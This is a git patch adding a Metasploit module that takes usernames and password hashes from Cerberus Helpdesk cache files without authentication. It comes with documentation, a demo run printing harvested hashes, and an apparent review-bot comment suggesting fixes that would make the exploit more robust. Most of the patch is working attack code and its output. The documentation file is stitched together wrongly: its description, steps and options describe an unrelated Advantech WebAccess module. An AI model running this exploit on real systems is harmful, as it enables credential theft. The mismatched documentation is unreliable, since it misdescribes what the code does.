From f008f2aa8fcfbf490f184c3f98fbddc19eeca0c2 Mon Sep 17 00:00:00 2001
From: h00die
Date: Fri, 16 Jun 2017 08:24:54 -0400
Subject: [PATCH] working code
---
.../cerberus_helpdesk_hash_disclosure.md | 69 +++++++++++++++++
.../cerberus_helpdesk_hash_disclosure.rb | 76 +++++++++++++++++++
2 files changed, 145 insertions(+)
create mode 100644 documentation/modules/auxiliary/gather/cerberus_helpdesk_hash_disclosure.md
create mode 100644 modules/auxiliary/gather/cerberus_helpdesk_hash_disclosure.rb
diff --git a/documentation/modules/auxiliary/gather/cerberus_helpdesk_hash_disclosure.md b/documentation/modules/auxiliary/gather/cerberus_helpdesk_hash_disclosure.md
new file mode 100644
index 0000000000..8eed3fe7f2
--- /dev/null
+++ b/documentation/modules/auxiliary/gather/cerberus_helpdesk_hash_disclosure.md
@@ -0,0 +1,69 @@
+## Description
+
+This module exploits three vulnerabilities in Advantech WebAccess.
+
+The first vulnerability is the ability for an arbitrary user to access the admin user list page,
+revealing the username of every user on the system.
+
+The second vulnerability is the user edit page can be accessed loaded by an arbitrary user, with
+the data of an arbitrary user.
+
+The final vulnerability exploited is that the HTML Form on the user edit page contains the user's
+plain text password in the masked password input box. Typically the system should replace the
+actual password with a masked character such as "*".
+
+
+## Vulnerable Application
+
+Version 8.1 was tested during development:
+
+http://advcloudfiles.advantech.com/web/Download/webaccess/8.1/AdvantechWebAccessUSANode8.1_20151230.exe
+
+8.2 is not vulnerable to this.
+
+## Verification Steps
+
+1. Start msfconsole
+2. ```use auxiliary/gahter/advantech_webaccess_creds```
+3. ```set WEBACCESSUSER [USER]```
+4. ```set WEBACCESSPASS [PASS]```
+5. ```run```
+
+## Options
+
+**WEBACCESSUSER**
+
+The username to use to log into Advantech WebAccess. By default, there is a built-in account
+```admin``` that you could use.
+
+**WEBACCESSPASS**
+
+The password to use to log into AdvanTech WebAccess. By default, the built-in account ```admin```
+does not have a password, which could be something you can use.
+
+
+## Demo
+
+msf > use auxiliary/gather/cerberus_helpdesk_hash_disclosure
+msf auxiliary(cerberus_helpdesk_hash_disclosure) > show options
+
+Module options (auxiliary/gather/cerberus_helpdesk_hash_disclosure):
+
+ Name Current Setting Required Description
+ ---- --------------- -------- -----------
+ Proxies no A proxy chain of format type:host:port[,type:host:port][...]
+ RHOSTS yes The target address range or CIDR identifier
+ RPORT 80 yes The target port (TCP)
+ SSL false no Negotiate SSL/TLS for outgoing connections
+ THREADS 1 yes The number of concurrent threads
+ URI / no URL of the Cerberus Helpdesk root
+ VHOST no HTTP server virtual host
+
+msf auxiliary(cerberus_helpdesk_hash_disclosure) > set rhosts 10.90.5.81
+rhosts => 10.90.5.81
+msf auxiliary(cerberus_helpdesk_hash_disclosure) > run
+
+[-] Invalid response received for /storage/tmp/devblocks_cache---ch_workers
+[+] admin:aaa34a6111abf0bd1b1c4d7cd7ebb37b
+[+] example:112302c209fe8d73f502c132a3da2b1c
+[+] foobar:0d108d09e5bbe40aade3de5c81e9e9c7
diff --git a/modules/auxiliary/gather/cerberus_helpdesk_hash_disclosure.rb b/modules/auxiliary/gather/cerberus_helpdesk_hash_disclosure.rb
new file mode 100644
index 0000000000..02bb9dc5ef
--- /dev/null
+++ b/modules/auxiliary/gather/cerberus_helpdesk_hash_disclosure.rb
@@ -0,0 +1,76 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+
+ include Msf::Exploit::Remote::HttpClient
+ include Msf::Auxiliary::Scanner
+ include Msf::Auxiliary::Report
+
+ def initialize
+ super(
+ 'Name' => 'Cerberus Helpdesk User Hash Disclosure',
+ 'Description' => %q{
+ This module extracts usernames and password hashes from the Cerberus Helpdesk
+ through an unauthenticated accss to a workers file.
+ Verified on Version 4.2.3 Stable (Build 925)
+ },
+ 'References' =>
+ [
+ [ 'EDB', '39526' ]
+ ],
+ 'Author' => [
+ 'asdizzle_', #discovery
+ 'h00die', #module
+ ],
+ 'License' => MSF_LICENSE
+ )
+
+ register_options(
+ [
+ OptString.new('URI', [false, 'URL of the Cerberus Helpdesk root', '/'])
+ ])
+ end
+
+ def run_host(rhost)
+ begin
+ ['devblocks', 'zend'].each do |site|
+ url = "#{datastore['URI']}storage/tmp/#{site}_cache---ch_workers"
+ vprint_status("Attempting to load data from #{url}")
+ res = send_request_cgi({'uri' => url})
+ if not res
+ print_error("#{peer} Unable to connect to #{url}")
+ else
+ if res.body.include?('pass')
+ # the returned object looks json-ish, but it isn't. Unsure of format, so we'll do some ugly manual parsing.
+ # this will be a rough equivalent to sed -e 's/s:5/\n/g' | grep email | cut -d '"' -f4,8 | sed 's/"/:/g'
+ result = res.body.split('s:5')
+ result.each do |cred|
+ if cred.include?('email')
+ cred = cred.split(':')
+ username = cred[3].tr('";', '') # remove extra characters
+ username = username[0...-1] # also remove trailing s
+ password_hash = cred[7].tr('";', '') # remove extra characters
+ print_good("#{username}:#{password_hash}")
+ store_valid_credential(
+ user: username,
+ private: password_hash,
+ private_type: :nonreplayable_hash
+ )
+ end
+ end
+ break # no need to get the 2nd url
+ else
+ print_error("Invalid response received for #{url}")
+ end
+ end
+ end
+
+ rescue ::Rex::ConnectionError
+ print_error("#{peer} Unable to connect to site")
+ return
+ end
+ end
+end
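Review bot: The manual parsing in run_host indexes `cred[3]` and `cred[7]` right after `cred = cred.split(':')` without checking that the split produced that many fields, so a chunk that contains 'email' but is laid out differently raises NoMethodError on `nil.tr`; that is not a `::Rex::ConnectionError`, so the rescue below does not catch it and the whole host is aborted on one malformed entry. A guard before the indexing, `fields = cred.split(':')` followed by `next unless fields.size > 7`, lets the loop skip the bad entry and still report the others. The request path is also built by string concatenation from `datastore['URI']`, so a value without a trailing slash yields a wrong path; `normalize_uri(datastore['URI'], 'storage', 'tmp', "#{site}_cache---ch_workers")` handles both forms, and checking `res.code` alongside `res.body.include?('pass')` would make the "Invalid response" branch more reliable than a substring match alone. Style-wise, `if not res` reads better as `unless res`, the whole-body `begin`/`rescue` can be a method-level `rescue`, and the `return` inside the rescue is redundant at the end of the method.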